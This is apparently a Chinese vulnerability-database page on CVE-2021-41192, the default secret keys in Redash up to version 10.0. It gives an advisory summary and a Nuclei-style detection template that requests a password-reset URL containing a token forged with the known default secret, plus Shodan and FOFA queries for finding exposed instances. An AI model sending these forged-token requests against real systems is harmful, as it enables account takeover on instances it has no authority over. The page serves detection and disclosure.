CVE-2021-41192: Redash Setup Configuration - Default Secrets Disclosure

日期: 2025-08-01 | 影响软件: Redash | POC: 已公开

漏洞描述

Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.

PoC代码[已公开]

id: CVE-2021-41192

info:
  name: Redash Setup Configuration - Default Secrets Disclosure
  author: bananabr
  severity: medium
  description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
  impact: |
    An attacker can gain unauthorized access to sensitive information and potentially compromise the Redash application.
  remediation: |
    Remove or update the default secrets in the Redash setup configuration file.
  reference:
    - https://hackerone.com/reports/1380121
    - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41192
    - https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-41192
    cwe-id: CWE-1188
    epss-score: 0.87556
    epss-percentile: 0.9943
    cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: redash
    product: redash
    shodan-query: http.favicon.hash:698624197
    fofa-query: icon_hash=698624197
  tags: cve2021,cve,hackerone,redash,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
      - "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Enter your new password:"
          - "redash"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e1c4d777cf3246607742286fd085bcdc463b78857c84b3e87dd974ed4ca83780022059f61681b271bfaf43b98c1a165a9a476a911477e7fd4b910003f3114c4375bb:922c64590222798bb761d5b6d8e72950

相关漏洞推荐